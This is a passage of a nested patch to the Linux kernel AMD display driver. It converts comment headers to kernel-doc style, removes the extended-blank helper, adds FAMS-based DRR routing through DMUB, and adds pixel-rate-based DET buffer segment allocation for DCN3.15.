+ 	 * enter/exit MPO when DCN still have enough resources.
+ 	 */
+-	if (pipe_in_use != dc->res_pool->pipe_count) {
++	if (pipe_in_use != dc->res_pool->pipe_count && !subvp_in_use && !odm_in_use) {
+ 		dc_release_state(transition_context);
+ 		return true;
+ 	}
+@@ -4430,21 +4565,17 @@ void dc_mclk_switch_using_fw_based_vblank_stretch_shut_down(struct dc *dc)
+ 		dc->current_state->bw_ctx.bw.dcn.clk.fw_based_mclk_switching_shut_down = true;
+ }
+ 
+-/*
+- *****************************************************************************
+- * Function: dc_is_dmub_outbox_supported -
++/**
++ * dc_is_dmub_outbox_supported - Check if DMUB firmware supports outbox notifications
+  *
+- * @brief
+- *      Checks whether DMUB FW supports outbox notifications, if supported
+- *		DM should register outbox interrupt prior to actually enabling interrupts
+- *		via dc_enable_dmub_outbox
++ * @dc: [in] dc structure
+  *
+- *  @param
+- *		[in] dc: dc structure
++ * Checks whether DMUB FW supports outbox notifications. If supported, the DM
++ * should register the outbox interrupt prior to actually enabling interrupts
++ * via dc_enable_dmub_outbox.
+  *
+- *  @return
+- *		True if DMUB FW supports outbox notifications, False otherwise
+- *****************************************************************************
++ * Return:
++ * True if DMUB FW supports outbox notifications, False otherwise
+  */
+ bool dc_is_dmub_outbox_supported(struct dc *dc)
+ {
+@@ -4462,21 +4593,17 @@ bool dc_is_dmub_outbox_supported(struct dc *dc)
+ 	return dc->debug.enable_dmub_aux_for_legacy_ddc;
+ }
+ 
+-/*
+- *****************************************************************************
+- *  Function: dc_enable_dmub_notifications
++/**
++ * dc_enable_dmub_notifications - Check if dmub fw supports outbox notifications
+  *
+- *  @brief
+- *		Calls dc_is_dmub_outbox_supported to check if dmub fw supports outbox
+- *		notifications. All DMs shall switch to dc_is_dmub_outbox_supported.
+- *		This API shall be removed after switching.
++ * @dc: [in] dc structure
+  *
+- *  @param
+- *		[in] dc: dc structure
++ * Calls dc_is_dmub_outbox_supported to check if dmub fw supports outbox
++ * notifications. All DMs shall switch to dc_is_dmub_outbox_supported.  This
++ * API shall be removed after switching.
+  *
+- *  @return
+- *		True if DMUB FW supports outbox notifications, False otherwise
+- *****************************************************************************
++ * Return:
++ * True if DMUB FW supports outbox notifications, False otherwise
+  */
+ bool dc_enable_dmub_notifications(struct dc *dc)
+ {
+@@ -4484,18 +4611,11 @@ bool dc_enable_dmub_notifications(struct dc *dc)
+ }
+ 
+ /**
+- *****************************************************************************
+- *  Function: dc_enable_dmub_outbox
+- *
+- *  @brief
+- *		Enables DMUB unsolicited notifications to x86 via outbox
++ * dc_enable_dmub_outbox - Enables DMUB unsolicited notification
+  *
+- *  @param
+- *		[in] dc: dc structure
++ * @dc: [in] dc structure
+  *
+- *  @return
+- *		None
+- *****************************************************************************
++ * Enables DMUB unsolicited notifications to x86 via outbox.
+  */
+ void dc_enable_dmub_outbox(struct dc *dc)
+ {
+@@ -4596,21 +4716,17 @@ uint8_t get_link_index_from_dpia_port_index(const struct dc *dc,
+ }
+ 
+ /**
+- *****************************************************************************
+- *  Function: dc_process_dmub_set_config_async
++ * dc_process_dmub_set_config_async - Submits set_config command
+  *
+- *  @brief
+- *		Submits set_config command to dmub via inbox message
++ * @dc: [in] dc structure
++ * @link_index: [in] link index
++ * @payload: [in] aux payload
++ * @notify: [out] set_config immediate reply
+  *
+- *  @param
+- *		[in] dc: dc structure
+- *		[in] link_index: link index
+- *		[in] payload: aux payload
+- *		[out] notify: set_config immediate reply
++ * Submits set_config command to dmub via inbox message.
+  *
+- *  @return
+- *		True if successful, False if failure
+- *****************************************************************************
++ * Return:
++ * True if successful, False if failure
+  */
+ bool dc_process_dmub_set_config_async(struct dc *dc,
+ 				uint32_t link_index,
+@@ -4646,21 +4762,17 @@ bool dc_process_dmub_set_config_async(struct dc *dc,
+ }
+ 
+ /**
+- *****************************************************************************
+- *  Function: dc_process_dmub_set_mst_slots
++ * dc_process_dmub_set_mst_slots - Submits MST slot allocation
+  *
+- *  @brief
+- *		Submits mst slot allocation command to dmub via inbox message
++ * @dc: [in] dc structure
++ * @link_index: [in] link index
++ * @mst_alloc_slots: [in] mst slots to be allotted
++ * @mst_slots_in_use: [out] mst slots in use returned in failure case
+  *
+- *  @param
+- *		[in] dc: dc structure
+- *		[in] link_index: link index
+- *		[in] mst_alloc_slots: mst slots to be allotted
+- *		[out] mst_slots_in_use: mst slots in use returned in failure case
++ * Submits mst slot allocation command to dmub via inbox message.
+  *
+- *	@return
+- *		DC_OK if successful, DC_ERROR if failure
+- *****************************************************************************
++ * Return:
++ * DC_OK if successful, DC_ERROR if failure
+  */
+ enum dc_status dc_process_dmub_set_mst_slots(const struct dc *dc,
+ 				uint32_t link_index,
+@@ -4700,19 +4812,12 @@ enum dc_status dc_process_dmub_set_mst_slots(const struct dc *dc,
+ }
+ 
+ /**
+- *****************************************************************************
+- *  Function: dc_process_dmub_dpia_hpd_int_enable
+- *
+- *  @brief
+- *		Submits dpia hpd int enable command to dmub via inbox message
++ * dc_process_dmub_dpia_hpd_int_enable - Submits DPIA HPD interrupt enable
+  *
+- *  @param
+- *		[in] dc: dc structure
+- *		[in] hpd_int_enable: 1 for hpd int enable, 0 to disable
++ * @dc: [in] dc structure
++ * @hpd_int_enable: [in] 1 for hpd int enable, 0 to disable
+  *
+- *	@return
+- *		None
+- *****************************************************************************
++ * Submits dpia hpd int enable command to dmub via inbox message.
+  */
+ void dc_process_dmub_dpia_hpd_int_enable(const struct dc *dc,
+ 				uint32_t hpd_int_enable)
+@@ -4741,16 +4846,13 @@ void dc_disable_accelerated_mode(struct dc *dc)
+ 
+ 
+ /**
+- *****************************************************************************
+- *  dc_notify_vsync_int_state() - notifies vsync enable/disable state
++ *  dc_notify_vsync_int_state - notifies vsync enable/disable state
+  *  @dc: dc structure
+- *	@stream: stream where vsync int state changed
+- *	@enable: whether vsync is enabled or disabled
+- *
+- *  Called when vsync is enabled/disabled
+- *	Will notify DMUB to start/stop ABM interrupts after steady state is reached
++ *  @stream: stream where vsync int state changed
++ *  @enable: whether vsync is enabled or disabled
+  *
+- *****************************************************************************
++ *  Called when vsync is enabled/disabled. Will notify DMUB to start/stop ABM
++  * interrupts after steady state is reached.
+  */
+ void dc_notify_vsync_int_state(struct dc *dc, struct dc_stream_state *stream, bool enable)
+ {
+@@ -4792,17 +4894,3 @@ void dc_notify_vsync_int_state(struct dc *dc, struct dc_stream_state *stream, bo
+ 	if (pipe->stream_res.abm && pipe->stream_res.abm->funcs->set_abm_pause)
+ 		pipe->stream_res.abm->funcs->set_abm_pause(pipe->stream_res.abm, !enable, i, pipe->stream_res.tg->inst);
+ }
+-/*
+- * dc_extended_blank_supported: Decide whether extended blank is supported
+- *
+- * Extended blank is a freesync optimization feature to be enabled in the future.
+- * During the extra vblank period gained from freesync, we have the ability to enter z9/z10.
+- *
+- * @param [in] dc: Current DC state
+- * @return: Indicate whether extended blank is supported (true or false)
+- */
+-bool dc_extended_blank_supported(struct dc *dc)
+-{
+-	return dc->debug.extended_blank_optimization && !dc->debug.disable_z10
+-		&& dc->caps.zstate_support && dc->caps.is_apu;
+-}
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index f0d05829288bd..a26e52abc9898 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -1444,6 +1444,26 @@ static int acquire_first_split_pipe(
+ 			split_pipe->plane_res.mpcc_inst = pool->dpps[i]->inst;
+ 			split_pipe->pipe_idx = i;
+ 
++			split_pipe->stream = stream;
++			return i;
++		} else if (split_pipe->prev_odm_pipe &&
++				split_pipe->prev_odm_pipe->plane_state == split_pipe->plane_state) {
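++			/* Detach this pipe from its ODM chain before reusing it for the split */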
++			split_pipe->prev_odm_pipe->next_odm_pipe = split_pipe->next_odm_pipe;
++			if (split_pipe->next_odm_pipe)
++				split_pipe->next_odm_pipe->prev_odm_pipe = split_pipe->prev_odm_pipe;
++
++			if (split_pipe->prev_odm_pipe->plane_state)
++				resource_build_scaling_params(split_pipe->prev_odm_pipe);
++
++			memset(split_pipe, 0, sizeof(*split_pipe));
++			split_pipe->stream_res.tg = pool->timing_generators[i];
++			split_pipe->plane_res.hubp = pool->hubps[i];
++			split_pipe->plane_res.ipp = pool->ipps[i];
++			split_pipe->plane_res.dpp = pool->dpps[i];
++			split_pipe->stream_res.opp = pool->opps[i];
++			split_pipe->plane_res.mpcc_inst = pool->dpps[i]->inst;
++			split_pipe->pipe_idx = i;
++
+ 			split_pipe->stream = stream;
+ 			return i;
+ 		}
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index 3f277009075fd..6409b8d8ff71e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -56,9 +56,7 @@ struct dmub_notification;
+ #define MIN_VIEWPORT_SIZE 12
+ #define MAX_NUM_EDP 2
+ 
+-/*******************************************************************************
+- * Display Core Interfaces
+- ******************************************************************************/
++/* Display Core Interfaces */
+ struct dc_versions {
+ 	const char *dc_ver;
+ 	struct dmcu_version dmcu_version;
+@@ -993,9 +991,7 @@ void dc_init_callbacks(struct dc *dc,
+ void dc_deinit_callbacks(struct dc *dc);
+ void dc_destroy(struct dc **dc);
+ 
+-/*******************************************************************************
+- * Surface Interfaces
+- ******************************************************************************/
++/* Surface Interfaces */
+ 
+ enum {
+ 	TRANSFER_FUNC_POINTS = 1025
+@@ -1274,12 +1270,23 @@ void dc_post_update_surfaces_to_stream(
+ 
+ #include "dc_stream.h"
+ 
+-/*
+- * Structure to store surface/stream associations for validation
++/**
++ * struct dc_validation_set - Struct to store surface/stream associations for validation
+  */
+ struct dc_validation_set {
++	/**
++	 * @stream: Stream state properties
++	 */
+ 	struct dc_stream_state *stream;
++
++	/**
++	 * @plane_state: Surface state
++	 */
+ 	struct dc_plane_state *plane_states[MAX_SURFACES];
++
++	/**
++	 * @plane_count: Total of active planes
++	 */
+ 	uint8_t plane_count;
+ };
+ 
+@@ -1326,15 +1333,12 @@ void dc_resource_state_destruct(struct dc_state *context);
+ 
+ bool dc_resource_is_dsc_encoding_supported(const struct dc *dc);
+ 
+-/*
+- * TODO update to make it about validation sets
+- * Set up streams and links associated to drive sinks
+- * The streams parameter is an absolute set of all active streams.
+- *
+- * After this call:
+- *   Phy, Encoder, Timing Generator are programmed and enabled.
+- *   New streams are enabled with blank stream; no memory read.
+- */
++enum dc_status dc_commit_streams(struct dc *dc,
++				 struct dc_stream_state *streams[],
++				 uint8_t stream_count);
++
++/* TODO: When the transition to the new commit sequence is done, remove this
++ * function in favor of dc_commit_streams. */
+ bool dc_commit_state(struct dc *dc, struct dc_state *context);
+ 
+ struct dc_state *dc_create_state(struct dc *dc);
+@@ -1342,9 +1346,7 @@ struct dc_state *dc_copy_state(struct dc_state *src_ctx);
+ void dc_retain_state(struct dc_state *context);
+ void dc_release_state(struct dc_state *context);
+ 
+-/*******************************************************************************
+- * Link Interfaces
+- ******************************************************************************/
++/* Link Interfaces */
+ 
+ struct dpcd_caps {
+ 	union dpcd_rev dpcd_rev;
+@@ -1446,9 +1448,7 @@ struct hdcp_caps {
+ 
+ uint32_t dc_get_opp_for_plane(struct dc *dc, struct dc_plane_state *plane);
+ 
+-/*******************************************************************************
+- * Sink Interfaces - A sink corresponds to a display output device
+- ******************************************************************************/
++/* Sink Interfaces - A sink corresponds to a display output device */
+ 
+ struct dc_container_id {
+ 	// 128bit GUID in binary form
+@@ -1520,8 +1520,6 @@ struct dc_sink_init_data {
+ 	bool converter_disable_audio;
+ };
+ 
+-bool dc_extended_blank_supported(struct dc *dc);
+-
+ struct dc_sink *dc_sink_create(const struct dc_sink_init_data *init_params);
+ 
+ /* Newer interfaces  */
+@@ -1531,9 +1529,7 @@ struct dc_cursor {
+ };
+ 
+ 
+-/*******************************************************************************
+- * Interrupt interfaces
+- ******************************************************************************/
++/* Interrupt interfaces */
+ enum dc_irq_source dc_interrupt_to_irq_source(
+ 		struct dc *dc,
+ 		uint32_t src_id,
+@@ -1545,9 +1541,7 @@ enum dc_irq_source dc_get_hpd_irq_source_at_index(
+ 
+ void dc_notify_vsync_int_state(struct dc *dc, struct dc_stream_state *stream, bool enable);
+ 
+-/*******************************************************************************
+- * Power Interfaces
+- ******************************************************************************/
++/* Power Interfaces */
+ 
+ void dc_set_power_state(
+ 		struct dc *dc,
+@@ -1620,14 +1614,10 @@ enum dc_status dc_process_dmub_set_mst_slots(const struct dc *dc,
+ void dc_process_dmub_dpia_hpd_int_enable(const struct dc *dc,
+ 				uint32_t hpd_int_enable);
+ 
+-/*******************************************************************************
+- * DSC Interfaces
+- ******************************************************************************/
++/* DSC Interfaces */
+ #include "dc_dsc.h"
+ 
+-/*******************************************************************************
+- * Disable acc mode Interfaces
+- ******************************************************************************/
++/* Disable acc mode Interfaces */
+ void dc_disable_accelerated_mode(struct dc *dc);
+ 
+ #endif /* DC_INTERFACE_H_ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
+index a461e9463534b..31bb7e782c6b1 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
+@@ -1026,3 +1026,10 @@ void dc_send_update_cursor_info_to_dmu(
+ 		dc_send_cmd_to_dmu(pCtx->stream->ctx->dmub_srv, &cmd);
+ 	}
+ }
++
++bool dc_dmub_check_min_version(struct dmub_srv *srv)
++{
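++	/* Assume the firmware is recent enough when no PSR-SU check is implemented for this DCN */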
++	if (!srv->hw_funcs.is_psrsu_supported)
++		return true;
++	return srv->hw_funcs.is_psrsu_supported(srv);
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.h b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.h
+index d34f5563df2ec..9a248ced03b9c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.h
+@@ -89,4 +89,5 @@ void dc_dmub_setup_subvp_dmub_command(struct dc *dc, struct dc_state *context, b
+ void dc_dmub_srv_log_diagnostic_data(struct dc_dmub_srv *dc_dmub_srv);
+ 
+ void dc_send_update_cursor_info_to_dmu(struct pipe_ctx *pCtx, uint8_t pipe_idx);
++bool dc_dmub_check_min_version(struct dmub_srv *srv);
+ #endif /* _DMUB_DC_SRV_H_ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_stream.h b/drivers/gpu/drm/amd/display/dc/dc_stream.h
+index 9e6025c98db91..364ff913527d8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_stream.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_stream.h
+@@ -41,6 +41,10 @@ struct timing_sync_info {
+ struct dc_stream_status {
+ 	int primary_otg_inst;
+ 	int stream_enc_inst;
++
++	/**
++	 * @plane_count: Total number of planes attached to a single stream
++	 */
+ 	int plane_count;
+ 	int audio_inst;
+ 	struct timing_sync_info timing_sync_info;
+@@ -127,6 +131,7 @@ union stream_update_flags {
+ 		uint32_t dsc_changed : 1;
+ 		uint32_t mst_bw : 1;
+ 		uint32_t crtc_timing_adjust : 1;
++		uint32_t fams_changed : 1;
+ 	} bits;
+ 
+ 	uint32_t raw;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index 622efa556e7ad..4ef632864948e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -2036,7 +2036,7 @@ void dcn20_optimize_bandwidth(
+ 			dc->clk_mgr,
+ 			context,
+ 			true);
+-	if (dc_extended_blank_supported(dc) && context->bw_ctx.bw.dcn.clk.zstate_support == DCN_ZSTATE_SUPPORT_ALLOW) {
++	if (context->bw_ctx.bw.dcn.clk.zstate_support == DCN_ZSTATE_SUPPORT_ALLOW) {
+ 		for (i = 0; i < dc->res_pool->pipe_count; ++i) {
+ 			struct pipe_ctx *pipe_ctx = &context->res_ctx.pipe_ctx[i];
+ 
+@@ -2044,7 +2044,7 @@ void dcn20_optimize_bandwidth(
+ 				&& pipe_ctx->stream->adjust.v_total_min == pipe_ctx->stream->adjust.v_total_max
+ 				&& pipe_ctx->stream->adjust.v_total_max > pipe_ctx->stream->timing.v_total)
+ 					pipe_ctx->plane_res.hubp->funcs->program_extended_blank(pipe_ctx->plane_res.hubp,
+-						pipe_ctx->dlg_regs.optimized_min_dst_y_next_start);
++						pipe_ctx->dlg_regs.min_dst_y_next_start);
+ 		}
+ 	}
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+index 25749f7d88366..94894fd6c9062 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+@@ -292,7 +292,12 @@ void optc3_wait_drr_doublebuffer_pending_clear(struct timing_generator *optc)
+ 
+ void optc3_set_vtotal_min_max(struct timing_generator *optc, int vtotal_min, int vtotal_max)
+ {
+-	optc1_set_vtotal_min_max(optc, vtotal_min, vtotal_max);
++	struct dc *dc = optc->ctx->dc;
++
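++	/* When FAMS can be used, route the DRR update through DMUB instead of programming the OTG directly */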
++	if (dc->caps.dmub_caps.mclk_sw && !dc->debug.disable_fams)
++		dc_dmub_srv_drr_update_cmd(dc, optc->inst, vtotal_min, vtotal_max);
++	else
++		optc1_set_vtotal_min_max(optc, vtotal_min, vtotal_max);
+ }
+ 
+ void optc3_tg_init(struct timing_generator *optc)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hubbub.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hubbub.c
+index 6360dc9502e70..0f231e42e4206 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hubbub.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hubbub.c
+@@ -103,6 +103,7 @@ static void dcn31_program_det_size(struct hubbub *hubbub, int hubp_inst, unsigne
+ 	default:
+ 		break;
+ 	}
++	DC_LOG_DEBUG("Set DET%d to %d segments\n", hubp_inst, det_size_segments);
+ 	/* Should never be hit, if it is we have an erroneous hw config*/
+ 	ASSERT(hubbub2->det0_size + hubbub2->det1_size + hubbub2->det2_size
+ 			+ hubbub2->det3_size + hubbub2->compbuf_size_segments <= hubbub2->crb_size_segs);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c b/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
+index 31cbc5762eab3..b9b1e5ac4f538 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
+@@ -136,6 +136,9 @@
+ 
+ #define DCN3_15_MAX_DET_SIZE 384
+ #define DCN3_15_CRB_SEGMENT_SIZE_KB 64
++#define DCN3_15_MAX_DET_SEGS (DCN3_15_MAX_DET_SIZE / DCN3_15_CRB_SEGMENT_SIZE_KB)
++/* A minimum of 2 extra segments needs to remain in the compbuf and be claimable to guarantee seamless mpo transitions */
++#define MIN_RESERVED_DET_SEGS 2
+ 
+ enum dcn31_clk_src_array_id {
+ 	DCN31_CLK_SRC_PLL0,
+@@ -1636,21 +1639,61 @@ static bool is_dual_plane(enum surface_pixel_format format)
+ 	return format >= SURFACE_PIXEL_FORMAT_VIDEO_BEGIN || format == SURFACE_PIXEL_FORMAT_GRPH_RGBE_ALPHA;
+ }
+ 
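++/* Bytes-per-pixel weight of the source format, used by the DET segment estimate below */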
++static int source_format_to_bpp(enum source_format_class SourcePixelFormat)
++{
++	if (SourcePixelFormat == dm_444_64)
++		return 8;
++	else if (SourcePixelFormat == dm_444_16)
++		return 2;
++	else if (SourcePixelFormat == dm_444_8)
++		return 1;
++	else if (SourcePixelFormat == dm_rgbe_alpha)
++		return 5;
++	else if (SourcePixelFormat == dm_420_8)
++		return 3;
++	else if (SourcePixelFormat == dm_420_12)
++		return 6;
++	else
++		return 4;
++}
++
++static bool allow_pixel_rate_crb(struct dc *dc, struct dc_state *context)
++{
++	int i;
++	struct resource_context *res_ctx = &context->res_ctx;
++
++	/* Don't apply for single stream */
++	if (context->stream_count < 2)
++		return false;
++
++	for (i = 0; i < dc->res_pool->pipe_count; i++) {
++		if (!res_ctx->pipe_ctx[i].stream)
++			continue;
++
++		/* Don't apply if MPO to avoid transition issues */
++		if (res_ctx->pipe_ctx[i].top_pipe && res_ctx->pipe_ctx[i].top_pipe->plane_state != res_ctx->pipe_ctx[i].plane_state)
++			return false;
++	}
++	return true;
++}
++
+ static int dcn315_populate_dml_pipes_from_context(
+ 	struct dc *dc, struct dc_state *context,
+ 	display_e2e_pipe_params_st *pipes,
+ 	bool fast_validate)
+ {
+-	int i, pipe_cnt;
++	int i, pipe_cnt, crb_idx, crb_pipes;
+ 	struct resource_context *res_ctx = &context->res_ctx;
+ 	struct pipe_ctx *pipe;
+ 	const int max_usable_det = context->bw_ctx.dml.ip.config_return_buffer_size_in_kbytes - DCN3_15_MIN_COMPBUF_SIZE_KB;
++	int remaining_det_segs = max_usable_det / DCN3_15_CRB_SEGMENT_SIZE_KB;
++	bool pixel_rate_crb = allow_pixel_rate_crb(dc, context);
+ 
+ 	DC_FP_START();
+ 	dcn20_populate_dml_pipes_from_context(dc, context, pipes, fast_validate);
+ 	DC_FP_END();
+ 
+-	for (i = 0, pipe_cnt = 0; i < dc->res_pool->pipe_count; i++) {
++	for (i = 0, pipe_cnt = 0, crb_pipes = 0; i < dc->res_pool->pipe_count; i++) {
+ 		struct dc_crtc_timing *timing;
+ 
+ 		if (!res_ctx->pipe_ctx[i].stream)
+@@ -1672,6 +1715,23 @@ static int dcn315_populate_dml_pipes_from_context(
+ 		pipes[pipe_cnt].dout.dsc_input_bpc = 0;
+ 		DC_FP_START();
+ 		dcn31_zero_pipe_dcc_fraction(pipes, pipe_cnt);
++		if (pixel_rate_crb && !pipe->top_pipe && !pipe->prev_odm_pipe) {
++			int bpp = source_format_to_bpp(pipes[pipe_cnt].pipe.src.source_format);
++			/* Ceil to crb segment size */
++			int approx_det_segs_required_for_pstate = dcn_get_approx_det_segs_required_for_pstate(
++					&context->bw_ctx.dml.soc, timing->pix_clk_100hz, bpp, DCN3_15_CRB_SEGMENT_SIZE_KB);
++			if (approx_det_segs_required_for_pstate <= 2 * DCN3_15_MAX_DET_SEGS) {
++				bool split_required = approx_det_segs_required_for_pstate > DCN3_15_MAX_DET_SEGS;
++				split_required = split_required || timing->pix_clk_100hz >= dcn_get_max_non_odm_pix_rate_100hz(&dc->dml.soc);
++				split_required = split_required || (pipe->plane_state && pipe->plane_state->src_rect.width > 5120);
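++				/* Split pipes need an even segment count, so round up to even */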
++				if (split_required)
++					approx_det_segs_required_for_pstate += approx_det_segs_required_for_pstate % 2;
++				pipes[pipe_cnt].pipe.src.det_size_override = approx_det_segs_required_for_pstate;
++				remaining_det_segs -= approx_det_segs_required_for_pstate;
++			} else
++				remaining_det_segs = -1;
++			crb_pipes++;
++		}
+ 		DC_FP_END();
+ 
+ 		if (pipes[pipe_cnt].dout.dsc_enable) {
+@@ -1690,16 +1750,54 @@ static int dcn315_populate_dml_pipes_from_context(
+ 				break;
+ 			}
+ 		}
+-
+ 		pipe_cnt++;
+ 	}
+ 
++	/* Spread remaining unreserved crb evenly among all pipes */
++	if (pixel_rate_crb) {
++		for (i = 0, pipe_cnt = 0, crb_idx = 0; i < dc->res_pool->pipe_count; i++) {
++			pipe = &res_ctx->pipe_ctx[i];
++			if (!pipe->stream)
++				continue;
++
++			/* Do not use asymmetric crb if not enough for pstate support */
++			if (remaining_det_segs < 0) {
++				pipes[pipe_cnt].pipe.src.det_size_override = 0;
++				continue;
++			}
++
++			if (!pipe->top_pipe && !pipe->prev_odm_pipe) {
++				bool split_required = pipe->stream->timing.pix_clk_100hz >= dcn_get_max_non_odm_pix_rate_100hz(&dc->dml.soc)
++						|| (pipe->plane_state && pipe->plane_state->src_rect.width > 5120);
++
++				if (remaining_det_segs > MIN_RESERVED_DET_SEGS)
++					pipes[pipe_cnt].pipe.src.det_size_override += (remaining_det_segs - MIN_RESERVED_DET_SEGS) / crb_pipes +
++							(crb_idx < (remaining_det_segs - MIN_RESERVED_DET_SEGS) % crb_pipes ? 1 : 0);
++				if (pipes[pipe_cnt].pipe.src.det_size_override > 2 * DCN3_15_MAX_DET_SEGS) {
++					/* Clamp to 2 pipe split max det segments */
++					remaining_det_segs += pipes[pipe_cnt].pipe.src.det_size_override - 2 * (DCN3_15_MAX_DET_SEGS);
++					pipes[pipe_cnt].pipe.src.det_size_override = 2 * DCN3_15_MAX_DET_SEGS;
++				}
++				if (pipes[pipe_cnt].pipe.src.det_size_override > DCN3_15_MAX_DET_SEGS || split_required) {
++					/* If we are splitting we must have an even number of segments */
++					remaining_det_segs += pipes[pipe_cnt].pipe.src.det_size_override % 2;
++					pipes[pipe_cnt].pipe.src.det_size_override -= pipes[pipe_cnt].pipe.src.det_size_override % 2;
++				}
++				/* Convert segments into size for DML use */
++				pipes[pipe_cnt].pipe.src.det_size_override *= DCN3_15_CRB_SEGMENT_SIZE_KB;
++
++				crb_idx++;
++			}
++			pipe_cnt++;
++		}
++	}
++
+ 	if (pipe_cnt)
+ 		context->bw_ctx.dml.ip.det_buffer_size_kbytes =
+ 				(max_usable_det / DCN3_15_CRB_SEGMENT_SIZE_KB / pipe_cnt) * DCN3_15_CRB_SEGMENT_SIZE_KB;
+ 	if (context->bw_ctx.dml.ip.det_buffer_size_kbytes > DCN3_15_MAX_DET_SIZE)
+ 		context->bw_ctx.dml.ip.det_buffer_size_kbytes = DCN3_15_MAX_DET_SIZE;
+-	ASSERT(context->bw_ctx.dml.ip.det_buffer_size_kbytes >= DCN3_15_DEFAULT_DET_SIZE);
++
+ 	dc->config.enable_4to1MPC = false;
+ 	if (pipe_cnt == 1 && pipe->plane_state && !dc->debug.disable_z9_mpc) {
+ 		if (is_dual_plane(pipe->plane_state->format)
+@@ -1707,7 +1805,9 @@ static int dcn315_populate_dml_pipes_from_context(
+ 			dc->config.enable_4to1MPC = true;
+ 			context->bw_ctx.dml.ip.det_buffer_size_kbytes =
+ 					(max_usable_det / DCN3_15_CRB_SEGMENT_SIZE_KB / 4) * DCN3_15_CRB_SEGMENT_SIZE_KB;
+-		} else if (!is_dual_plane(pipe->plane_state->format) && pipe->plane_state->src_rect.width <= 5120) {
++		} else if (!is_dual_plane(pipe->plane_state->format)
++				&& pipe->plane_state->src_rect.width <= 5120
++				&& pipe->stream->timing.pix_clk_100hz < dcn_get_max_non_odm_pix_rate_100hz(&dc->dml.soc)) {
+ 			/* Limit to 5k max to avoid forced pipe split when there is not enough detile for swath */
+ 			context->bw_ctx.dml.ip.det_buffer_size_kbytes = 192;
+ 			pipes[0].pipe.src.unbounded_req_mode = true;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+index 186538e3e3c0c..dbe5d2efa4a30 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+@@ -948,10 +948,10 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ {
+ 	int plane_count;
+ 	int i;
+-	unsigned int optimized_min_dst_y_next_start_us;
++	unsigned int min_dst_y_next_start_us;
+ 
+ 	plane_count = 0;
+-	optimized_min_dst_y_next_start_us = 0;
++	min_dst_y_next_start_us = 0;
+ 	for (i = 0; i < dc->res_pool->pipe_count; i++) {
+ 		if (context->res_ctx.pipe_ctx[i].plane_state)
+ 			plane_count++;
+@@ -973,19 +973,18 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	else if (context->stream_count == 1 &&  context->streams[0]->signal == SIGNAL_TYPE_EDP) {
+ 		struct dc_link *link = context->streams[0]->sink->link;
+ 		struct dc_stream_status *stream_status = &context->stream_status[0];
++		struct dc_stream_state *current_stream = context->streams[0];
+ 		int minmum_z8_residency = dc->debug.minimum_z8_residency_time > 0 ? dc->debug.minimum_z8_residency_time : 1000;
+ 		bool allow_z8 = context->bw_ctx.dml.vba.StutterPeriod > (double)minmum_z8_residency;
+ 		bool is_pwrseq0 = link->link_index == 0;
++		bool isFreesyncVideo;
+ 
+-		if (dc_extended_blank_supported(dc)) {
+-			for (i = 0; i < dc->res_pool->pipe_count; i++) {
+-				if (context->res_ctx.pipe_ctx[i].stream == context->streams[0]
+-					&& context->res_ctx.pipe_ctx[i].stream->adjust.v_total_min == context->res_ctx.pipe_ctx[i].stream->adjust.v_total_max
+-					&& context->res_ctx.pipe_ctx[i].stream->adjust.v_total_min > context->res_ctx.pipe_ctx[i].stream->timing.v_total) {
+-						optimized_min_dst_y_next_start_us =
+-							context->res_ctx.pipe_ctx[i].dlg_regs.optimized_min_dst_y_next_start_us;
+-						break;
+-				}
++		isFreesyncVideo = current_stream->adjust.v_total_min == current_stream->adjust.v_total_max;
++		isFreesyncVideo = isFreesyncVideo && current_stream->timing.v_total < current_stream->adjust.v_total_min;
++		for (i = 0; i < dc->res_pool->pipe_count; i++) {
